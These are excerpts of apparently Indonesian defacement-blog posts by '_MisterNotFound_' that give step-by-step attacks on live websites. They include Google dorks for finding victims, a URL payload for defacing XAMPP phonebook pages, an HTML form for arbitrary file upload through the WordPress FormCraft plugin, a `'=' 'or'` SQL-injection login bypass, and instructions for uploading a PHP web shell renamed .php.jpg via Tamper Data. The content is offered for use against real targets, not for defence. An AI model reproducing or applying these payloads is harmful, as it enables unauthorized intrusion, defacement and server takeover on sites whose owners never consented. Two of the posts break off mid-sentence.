anonymous indonesia

DORK : inurl:/xampp/phonebook.php Exploit code : www.FUCK.yu/xampp/phonebook.php?lastname=Hacked by&firstname=_MisterNotFound_&phone=Garuda Cyber Ghost Team POC :

Assalamualikum Marhaban Ya Ramadhan Gak terasa udah memasuki bulan puasa Ramadhan Sebelumnya _MisterNotFound_ mohon maaf ya jika ane punya banyak salah :v Dan semoga puasa kalian lancar dan barokah, Amiin :) Langsung aja dehh :D Shortcut : Click Here for Tutorial on Youtube BAHAN :    1. DORK : inurl:/wp-content/plugins/formcraft/file-upload/    2. EXPLOIT : /wp-content/plugins/formcraft/file-upload/server/php/upload.php    3. CSRF   <form method="POST" action="http://FUCK.yu/wp-content/plugins/formcraft/file-upload/server/php/" enctype="multipart/form-data"> <input type="file" name="files[]" /><button>Hajar...!!!</button> </form>   4.  Handsome B-)   POC :    1. Agar varokah, dorking dulu lah :D Whatever, pake bing atau google :)       2.  Choose your target, men. And this is my FUCKIN target :D     3. Masukkan exploit nya di belakang Url target anda. Dan jika...

Assalamualaikum sobat newbie :) Udah lama gak posting nih -_- Kali ini _MisterNotFound_ nge post tentang POC baru nih :) Oke langsung aja yok Shortcut : Click Here for Tutorial on Youtube Bahan : Tamer Data Add-Ons Mozilla Firefox DORK :  inurl:/admincp/login.php Bypass ID and Password : '=' 'or' Your Shell   Your Script Deface  Shell access : /upload/images/YOUR-SHELL.php POC :   1. Seperti biasa, dorking dulu di google :)   2.  Pilih target, lalu masukan exploit /admincp/ untuk akses ke halaman admin   3. Maka halam admin akan muncul seperti ini 4. Masukkan kode bypass id dan password nya seperti gambar diatas, lalu klik login. 5. Jika vuln, maka anda akan masuk ke dashboard admin dari web tersebut :)  6. Saatnya upload Shell. Pilih menu media atau galery   7. Lalu isi seperti ini. Dan jangan lupa rename ekstensi Shell anda dari .php menjadi .php.jpg 8. Kemudian aktifkan Tamper Data 9. Setelah itu, klik upload pada form galery te...